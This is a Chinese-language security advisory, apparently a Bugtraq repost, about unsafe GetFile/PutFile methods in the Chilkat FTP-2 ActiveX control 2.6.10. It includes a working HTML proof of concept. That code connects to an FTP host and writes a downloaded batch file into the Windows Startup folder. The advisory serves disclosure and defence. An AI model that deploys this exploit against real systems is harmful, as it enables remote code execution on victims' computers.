受影响系统:
Chilkat Software FTP-2 ActiveX 2.6.10
描述:
BUGTRAQ ID: 45611
ChilkatFtp2 ActiveX是商业文件传输协议组件。
Chilkat FTP2 ActiveX控件在实现上存在多个不安全类函数漏洞,远程攻击者可利用这些漏洞控制受影的计算机或造成拒绝服务。
这些漏洞源于包含不安全的"GetFile()"或"PutFile()"类函数的"ChilkatFtp2.ChilkatFtp2" ActiveX控件(ChilkatFtp2.dll)。此类允许通过GetFile()类函数复制/改写任意位置的文件。
<*来源:rgod (rgod@autistici.org)
链接:http://marc.info/?l=bugtraq&m=129364573026871&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<object classid='clsid:302124C4-30A0-484A-9C7A-B51D5BA5306B' id='obj' />
</object>
<script>
obj.UnlockComponent("suntzu"); //needed for file transfer operations, type whatever here
obj.Port=21; //configure ftp connection
obj.Hostname="192.168.0.1"; //change here
obj.ConnectTimeout=5;
obj.Passive=1;
var x;
x=obj.Connect();
if (x==1){
x = obj.GetFile("suntzu.txt","c:/Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/suntzu.bat"); //boom
}
obj.Disconnect();
</script>
</html>
建议:
厂商补丁:
Chilkat Software
—————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.chilkatsoft.com/
0 条评论。